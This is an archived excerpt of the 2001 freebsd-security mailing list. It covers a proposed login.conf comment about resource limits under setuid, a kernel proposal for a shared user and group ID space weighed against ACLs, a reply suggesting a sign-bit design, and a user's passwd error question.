>
> Would there be a cleaner way to do this?
Until there's an aggreed upon and clean solution, would a comment
at the top of /etc/login.conf raise attention? Maybe with
additional pointers to alternative solutions (wrapper scripts
with ulimit(builtin) and softlimit(1), accompanying setrlimit(2)
calls next to setuid(2) calls)?
--- login.conf 2001/03/17 16:39:33 1.1
+++ login.conf 2001/03/17 16:40:55
@@ -6,6 +6,8 @@
#
# This file controls resource limits, accounting limits and
# default user environment settings.
+# Keep in mind that settings might not always be obeyed
+# when daemons change their identity by means of setuid(2) et al.
#
# $FreeBSD: src/etc/login.conf,v 1.34.2.2 2000/06/02 20:53:55 alfred Exp $
#
virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 16: 7:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp02.teb1.iconnet.net (smtp02.teb1.iconnet.net [209.3.218.43])
by hub.freebsd.org (Postfix) with ESMTP
id 8CFED37B718; Sat, 17 Mar 2001 16:07:27 -0800 (PST)
(envelope-from babkin@bellatlantic.net)
Received: from bellatlantic.net (client-151-198-135-1.nnj.dialup.bellatlantic.net [151.198.135.1])
by smtp02.teb1.iconnet.net (8.9.1/8.9.1) with ESMTP id TAA20966;
Sat, 17 Mar 2001 19:07:24 -0500 (EST)
Message-ID: <3AB3FC38.94711FFF@bellatlantic.net>
Date: Sat, 17 Mar 2001 19:07:20 -0500
From: Sergey Babkin <babkin@bellatlantic.net>
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-19990626-CURRENT i386)
X-Accept-Language: en, ru
MIME-Version: 1.0
To: security@freebsd.org, Wes Peters <wes@softweyr.com>,
Robert Watson <rwatson@freebsd.org>, fs@freebsd.org
Subject: about common group & user ID space (PR kern/14584)
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
All,
I want to commit PR kern/14584. I've been told that it's good
to discuss it in -arch, -security and -fs. (It has been sort of
discussed on -hackers already, there were not much replies).
So I've posted a message on -arch, and now on -security and -fs.
I've also discussed this idea shortly with Kirk McKusick at
Usenix-2000 at the BSD BOF and he generally liked it and suggested
to review further.
There is a rather long description in the PR. In short, the idea
is that all the IDs above some value get shared by both users
and groups. That is, not only two users can't have the same IDs
(unless they are just aliases like root and toor) and two
groups can't have the same ID, but an user and a group can't
have the same ID as well. This allows to use the UID field
in the inodes to give permissions in the unified UID&GID space,
and thus give two groups (say, "writers" and "readers") different
permissions to the file wtihout resorting to trickery with
subdirectories. The ID space below this some value is kept separate
for UIDs and GIDs for compatibility with the historic IDs.
In the patch this feature is enabled by a kernel compilation option,
plus even with this option compiled a sysctl has to be set. So
it would not affect the unsuspecting users.
Why not leave it to the real ACLs ?
The problem I see with ACLs is that they break all the standard
Unix commands dealing with displaying or storing the permissions,
such as ls, tar, cpio and others of this sort.
Probably the ACLs are _the_ way to go for the high-security
environments.
But from my personal experience with systems administration of
HP-UX and NetWare in not-so-high-security environments, the careless
application of ACLs tends to cause quite a systems administration
nighmare. So I personally would avoid them for as long as possible
and use only when really neccessary.
And that seems to be not only my experience. For example, in
UnixWare the ACLs were implemented and then essentially scrapped
(never ported to VxFS and left working only as remnants in SFS,
a version of FFS with ACLs which does not seem to be used by anyone
any more and which may not be used as a root filesystem any more).
This is the reason why I think that the classic Unix permissions
still have a long live ahead, so some backwards-compatible extensions
to them might be quite usable.
Any comments are welcome.
-SB
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 22:32:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp23.singnet.com.sg (smtp23.singnet.com.sg [165.21.101.203])
by hub.freebsd.org (Postfix) with ESMTP id DE7EE37B718
for <freebsd-security@freebsd.org>; Sat, 17 Mar 2001 22:32:12 -0800 (PST)
(envelope-from spades@galaxynet.org)
Received: from bryan (ad202.166.106.236.magix.com.sg [202.166.106.236])
by smtp23.singnet.com.sg (8.11.2/8.11.2) with SMTP id f2I6WAe11423
for <freebsd-security@freebsd.org>; Sun, 18 Mar 2001 14:32:10 +0800
Message-Id: <3.0.32.20010318144200.006c4098@smtp.magix.com.sg>
X-Sender: spades@smtp.magix.com.sg
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sun, 18 Mar 2001 14:42:00 +0800
To: freebsd-security@freebsd.org
From: Spades <spades@galaxynet.org>
Subject: passwd problem
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
# passwd
Warning: configuration file missing; please run 'tconf'
Unable to update EPS password.
Password changed.
How do i reinstall passwd or fix this?
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 23:38:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp10.phx.gblx.net (smtp10.phx.gblx.net [206.165.6.140])
by hub.freebsd.org (Postfix) with ESMTP
id BE3BB37B725; Sat, 17 Mar 2001 23:38:51 -0800 (PST)
(envelope-from tlambert@usr05.primenet.com)
Received: (from daemon@localhost)
by smtp10.phx.gblx.net (8.9.3/8.9.3) id AAA96598;
Sun, 18 Mar 2001 00:38:34 -0700
Received: from usr05.primenet.com(206.165.6.205)
via SMTP by smtp10.phx.gblx.net, id smtpdiFiFMa; Sun Mar 18 00:38:26 2001
Received: (from tlambert@localhost)
by usr05.primenet.com (8.8.5/8.8.5) id AAA03250;
Sun, 18 Mar 2001 00:38:33 -0700 (MST)
From: Terry Lambert <tlambert@primenet.com>
Message-Id: <200103180738.AAA03250@usr05.primenet.com>
Subject: Re: about common group & user ID space (PR kern/14584)
To: babkin@bellatlantic.net (Sergey Babkin)
Date: Sun, 18 Mar 2001 07:38:31 +0000 (GMT)
Cc: security@FreeBSD.ORG, wes@softweyr.com (Wes Peters),
rwatson@FreeBSD.ORG (Robert Watson), fs@FreeBSD.ORG
In-Reply-To: <3AB3FC38.94711FFF@bellatlantic.net> from "Sergey Babkin" at Mar 17, 2001 07:07:20 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> I want to commit PR kern/14584. I've been told that it's good
> to discuss it in -arch, -security and -fs. (It has been sort of
> discussed on -hackers already, there were not much replies).
> So I've posted a message on -arch, and now on -security and -fs.
> I've also discussed this idea shortly with Kirk McKusick at
> Usenix-2000 at the BSD BOF and he generally liked it and suggested
> to review further.
You could do this a bit more cleanly by just stealing the sign
bit, and setting if the uid field contained a group ID.
There would be no conversion problem for an existing system.
The sign bit would not be "stolen", unless the sysctl was in
the "active" state.
This changes the check to a one line change, conditional on
the high bit being set.
In trade, the "set group owner" code gets a bit more complicated,
but that's in the user space "chown" code, where you have to tell
it to set a group, explicitly (so that it will look up the group,
not the user, for a non-numeric ID, and set the high bit when
stuffing it in the chown id field).
Note that this change is really necessary in the user space code
anyway: even if you make the UID and GID numeric values not
intersect, there is still the possibility of a group and user
having the same name, so a set-by-name needs a seperate flag
(thing "chown bin.bin foo", for example).
The benefits in not having the grovel through the FS contents, or
do a more complex ID space transformations, and the moving of the
majority of changes to user space, combined with the fact that if
you turn it off, the ownership doesn't need to be reverted, are
all plusses.
Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message